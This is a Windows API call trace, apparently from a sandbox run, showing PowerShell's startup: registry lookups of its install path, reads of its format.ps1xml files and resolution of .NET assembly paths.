	[0149.964] RegQueryValueExW (in: hKey=0x15c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d0ac, lpData=0x283e00, lpcbData=0x18d0a8*=0x56 | out: lpType=0x18d0ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d0a8*=0x56) returned 0x0
	[0149.964] CoTaskMemFree (pv=0x283e00) 
	[0149.964] RegCloseKey (hKey=0x15c) returned 0x0
	[0149.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x18cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0149.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x18cc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0159.316] VirtualQuery (in: lpAddress=0x18be40, lpBuffer=0x18cd00, dwLength=0x30 | out: lpBuffer=0x18cd00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.318] VirtualQuery (in: lpAddress=0x18be40, lpBuffer=0x18cd00, dwLength=0x30 | out: lpBuffer=0x18cd00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.319] VirtualQuery (in: lpAddress=0x18be40, lpBuffer=0x18cd00, dwLength=0x30 | out: lpBuffer=0x18cd00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.325] CoTaskMemAlloc (cb=0x104) returned 0x2358c0
	[0159.325] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2358c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.325] CoTaskMemFree (pv=0x2358c0) 
	[0160.005] CoTaskMemAlloc (cb=0x104) returned 0x2358c0
	[0160.005] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2358c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.011] CoTaskMemAlloc (cb=0x104) returned 0x2358c0
	[0160.011] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2358c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.013] CoTaskMemAlloc (cb=0x104) returned 0x2358c0
	[0160.014] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2358c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.016] CoTaskMemAlloc (cb=0x104) returned 0x2358c0
	[0160.016] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2358c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.058] ReadFile (in: hFile=0x308, lpBuffer=0x345ec90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ce68, lpOverlapped=0x0 | out: lpBuffer=0x345ec90*, lpNumberOfBytesRead=0x18ce68*=0x1000, lpOverlapped=0x0) returned 1
	[0160.075] ReadFile (in: hFile=0x308, lpBuffer=0x345ec90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ce68, lpOverlapped=0x0 | out: lpBuffer=0x345ec90*, lpNumberOfBytesRead=0x18ce68*=0x1000, lpOverlapped=0x0) returned 1
	[0160.111] ReadFile (in: hFile=0x308, lpBuffer=0x345ec90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ce68, lpOverlapped=0x0 | out: lpBuffer=0x345ec90*, lpNumberOfBytesRead=0x18ce68*=0x1000, lpOverlapped=0x0) returned 1
	[0160.133] ReadFile (in: hFile=0x308, lpBuffer=0x345ec90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ce68, lpOverlapped=0x0 | out: lpBuffer=0x345ec90*, lpNumberOfBytesRead=0x18ce68*=0x1000, lpOverlapped=0x0) returned 1
	[0160.157] ReadFile (in: hFile=0x308, lpBuffer=0x345ec90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ce68, lpOverlapped=0x0 | out: lpBuffer=0x345ec90*, lpNumberOfBytesRead=0x18ce68*=0x1000, lpOverlapped=0x0) returned 1
	[0160.185] ReadFile (in: hFile=0x308, lpBuffer=0x345ec90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ce68, lpOverlapped=0x0 | out: lpBuffer=0x345ec90*, lpNumberOfBytesRead=0x18ce68*=0x9e2, lpOverlapped=0x0) returned 1
	[0160.191] ReadFile (in: hFile=0x308, lpBuffer=0x345e1da, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x18ce68, lpOverlapped=0x0 | out: lpBuffer=0x345e1da*, lpNumberOfBytesRead=0x18ce68*=0x0, lpOverlapped=0x0) returned 1
	[0160.195] ReadFile (in: hFile=0x308, lpBuffer=0x345ec90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ce68, lpOverlapped=0x0 | out: lpBuffer=0x345ec90*, lpNumberOfBytesRead=0x18ce68*=0x0, lpOverlapped=0x0) returned 1
	[0160.471] CoCreateGuid (in: pguid=0x18d120 | out: pguid=0x18d120*(Data1=0x63a10314, Data2=0x39e0, Data3=0x427f, Data4=([0]=0x8d, [1]=0xe1, [2]=0x5a, [3]=0x7c, [4]=0x3a, [5]=0x48, [6]=0x29, [7]=0x75))) returned 0x0
	[0160.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0160.474] SetErrorMode (uMode=0x1) returned 0x1
	[0160.474] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0160.546] GetFileType (hFile=0x308) returned 0x1
	[0160.546] SetErrorMode (uMode=0x1) returned 0x1
	[0160.546] GetFileType (hFile=0x308) returned 0x1
	[0160.546] ReadFile (in: hFile=0x308, lpBuffer=0x34897f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ce68, lpOverlapped=0x0 | out: lpBuffer=0x34897f8*, lpNumberOfBytesRead=0x18ce68*=0x1000, lpOverlapped=0x0) returned 1
	[0160.669] ReadFile (in: hFile=0x308, lpBuffer=0x34897f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ce68, lpOverlapped=0x0 | out: lpBuffer=0x34897f8*, lpNumberOfBytesRead=0x18ce68*=0x1000, lpOverlapped=0x0) returned 1
	[0160.917] ReadFile (in: hFile=0x308, lpBuffer=0x34897f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ce68, lpOverlapped=0x0 | out: lpBuffer=0x34897f8*, lpNumberOfBytesRead=0x18ce68*=0x1000, lpOverlapped=0x0) returned 1
	[0161.029] ReadFile (in: hFile=0x308, lpBuffer=0x34897f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ce68, lpOverlapped=0x0 | out: lpBuffer=0x34897f8*, lpNumberOfBytesRead=0x18ce68*=0x1000, lpOverlapped=0x0) returned 1
	[0161.075] ReadFile (in: hFile=0x308, lpBuffer=0x34897f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ce68, lpOverlapped=0x0 | out: lpBuffer=0x34897f8*, lpNumberOfBytesRead=0x18ce68*=0x1000, lpOverlapped=0x0) returned 1
	[0161.293] ReadFile (in: hFile=0x308, lpBuffer=0x34897f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ce68, lpOverlapped=0x0 | out: lpBuffer=0x34897f8*, lpNumberOfBytesRead=0x18ce68*=0xfb2, lpOverlapped=0x0) returned 1
	[0161.696] ReadFile (in: hFile=0x308, lpBuffer=0x3488f12, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x18ce68, lpOverlapped=0x0 | out: lpBuffer=0x3488f12*, lpNumberOfBytesRead=0x18ce68*=0x0, lpOverlapped=0x0) returned 1
	[0161.933] ReadFile (in: hFile=0x308, lpBuffer=0x34897f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ce68, lpOverlapped=0x0 | out: lpBuffer=0x34897f8*, lpNumberOfBytesRead=0x18ce68*=0x0, lpOverlapped=0x0) returned 1
	[0162.351] CloseHandle (hObject=0x308) returned 1
	[0164.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0164.473] SetErrorMode (uMode=0x1) returned 0x1
	[0164.473] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18ce10 | out: lpFileInformation=0x18ce10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0167.546] SetErrorMode (uMode=0x1) returned 0x1
	[0167.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0167.546] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18cef8 | out: phkResult=0x18cef8*=0x308) returned 0x0
	[0167.546] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18ce7c, lpData=0x0, lpcbData=0x18ce78*=0x0 | out: lpType=0x18ce7c*=0x1, lpData=0x0, lpcbData=0x18ce78*=0x56) returned 0x0
	[0167.546] CoTaskMemAlloc (cb=0x5a) returned 0x284570
	[0167.546] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18ce4c, lpData=0x284570, lpcbData=0x18ce48*=0x56 | out: lpType=0x18ce4c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18ce48*=0x56) returned 0x0
	[0167.547] CoTaskMemFree (pv=0x284570) 
	[0167.547] RegCloseKey (hKey=0x308) returned 0x0
	[0167.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0167.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0167.550] CoCreateGuid (in: pguid=0x18d120 | out: pguid=0x18d120*(Data1=0xc9deadc5, Data2=0x7d48, Data3=0x41b1, Data4=([0]=0xbc, [1]=0xb3, [2]=0x77, [3]=0x50, [4]=0x40, [5]=0x6c, [6]=0xa5, [7]=0x31))) returned 0x0
	[0167.554] CoCreateGuid (in: pguid=0x18d120 | out: pguid=0x18d120*(Data1=0x7f56c9a9, Data2=0x10ac, Data3=0x4ace, Data4=([0]=0xb2, [1]=0x5f, [2]=0x73, [3]=0xf2, [4]=0xe2, [5]=0x6e, [6]=0x4f, [7]=0xc0))) returned 0x0
	[0167.555] CoCreateGuid (in: pguid=0x18d120 | out: pguid=0x18d120*(Data1=0x32e0b33f, Data2=0x3ac1, Data3=0x4be4, Data4=([0]=0xb8, [1]=0xb5, [2]=0x11, [3]=0x7a, [4]=0x2a, [5]=0x9a, [6]=0xba, [7]=0xba))) returned 0x0
	[0167.556] CoCreateGuid (in: pguid=0x18d120 | out: pguid=0x18d120*(Data1=0xa0e0c280, Data2=0x7219, Data3=0x4c0c, Data4=([0]=0x90, [1]=0xd, [2]=0x83, [3]=0x4c, [4]=0x56, [5]=0xb5, [6]=0x9, [7]=0xeb))) returned 0x0
	[0167.556] CoCreateGuid (in: pguid=0x18d120 | out: pguid=0x18d120*(Data1=0xf16d972c, Data2=0x5709, Data3=0x4691, Data4=([0]=0xb2, [1]=0x9e, [2]=0x8b, [3]=0x4f, [4]=0x67, [5]=0xc4, [6]=0x96, [7]=0xe5))) returned 0x0
	[0167.557] CoCreateGuid (in: pguid=0x18d120 | out: pguid=0x18d120*(Data1=0xa0840dce, Data2=0xbb46, Data3=0x45b9, Data4=([0]=0xa5, [1]=0x2b, [2]=0xfe, [3]=0x6c, [4]=0x4b, [5]=0x8c, [6]=0x3f, [7]=0x77))) returned 0x0
	[0167.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.558] SetErrorMode (uMode=0x1) returned 0x1
	[0167.558] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0167.558] GetFileType (hFile=0x308) returned 0x1
	[0167.558] SetErrorMode (uMode=0x1) returned 0x1
	[0167.558] GetFileType (hFile=0x308) returned 0x1
	[0167.558] ReadFile (in: hFile=0x308, lpBuffer=0x34d5558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ce68, lpOverlapped=0x0 | out: lpBuffer=0x34d5558*, lpNumberOfBytesRead=0x18ce68*=0x1000, lpOverlapped=0x0) returned 1
	[0167.559] ReadFile (in: hFile=0x308, lpBuffer=0x34d5558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ce68, lpOverlapped=0x0 | out: lpBuffer=0x34d5558*, lpNumberOfBytesRead=0x18ce68*=0x1000, lpOverlapped=0x0) returned 1
	[0167.560] ReadFile (in: hFile=0x308, lpBuffer=0x34d5558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ce68, lpOverlapped=0x0 | out: lpBuffer=0x34d5558*, lpNumberOfBytesRead=0x18ce68*=0x1000, lpOverlapped=0x0) returned 1
	[0167.560] ReadFile (in: hFile=0x308, lpBuffer=0x34d5558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ce68, lpOverlapped=0x0 | out: lpBuffer=0x34d5558*, lpNumberOfBytesRead=0x18ce68*=0x1000, lpOverlapped=0x0) returned 1
	[0167.562] ReadFile (in: hFile=0x308, lpBuffer=0x34d5558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ce68, lpOverlapped=0x0 | out: lpBuffer=0x34d5558*, lpNumberOfBytesRead=0x18ce68*=0x1000, lpOverlapped=0x0) returned 1
	[0167.562] ReadFile (in: hFile=0x308, lpBuffer=0x34d5558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ce68, lpOverlapped=0x0 | out: lpBuffer=0x34d5558*, lpNumberOfBytesRead=0x18ce68*=0x1000, lpOverlapped=0x0) returned 1
	[0167.562] ReadFile (in: hFile=0x308, lpBuffer=0x34d5558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ce68, lpOverlapped=0x0 | out: lpBuffer=0x34d5558*, lpNumberOfBytesRead=0x18ce68*=0xaca, lpOverlapped=0x0) returned 1
	[0167.562] ReadFile (in: hFile=0x308, lpBuffer=0x34d4b8a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x18ce68, lpOverlapped=0x0 | out: lpBuffer=0x34d4b8a*, lpNumberOfBytesRead=0x18ce68*=0x0, lpOverlapped=0x0) returned 1
	[0167.562] ReadFile (in: hFile=0x308, lpBuffer=0x34d5558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ce68, lpOverlapped=0x0 | out: lpBuffer=0x34d5558*, lpNumberOfBytesRead=0x18ce68*=0x0, lpOverlapped=0x0) returned 1
	[0167.562] CloseHandle (hObject=0x308) returned 1
	[0167.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.562] SetErrorMode (uMode=0x1) returned 0x1
	[0167.562] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18ce10 | out: lpFileInformation=0x18ce10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0167.562] SetErrorMode (uMode=0x1) returned 0x1
	[0167.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.563] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18cef8 | out: phkResult=0x18cef8*=0x308) returned 0x0
	[0167.563] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18ce7c, lpData=0x0, lpcbData=0x18ce78*=0x0 | out: lpType=0x18ce7c*=0x1, lpData=0x0, lpcbData=0x18ce78*=0x56) returned 0x0
	[0167.563] CoTaskMemAlloc (cb=0x5a) returned 0x284570
	[0167.563] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18ce4c, lpData=0x284570, lpcbData=0x18ce48*=0x56 | out: lpType=0x18ce4c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18ce48*=0x56) returned 0x0
	[0167.563] CoTaskMemFree (pv=0x284570) 
	[0167.563] RegCloseKey (hKey=0x308) returned 0x0
	[0167.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x18c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0167.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0167.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x18c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0168.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x18c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0168.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x18c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0168.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x18c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0168.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x18c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0168.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x18c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0168.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x18c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0168.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x18c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0169.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x18c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0169.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x18c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0169.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x18c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0169.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x18c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0169.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x18c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0169.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0169.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x18c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
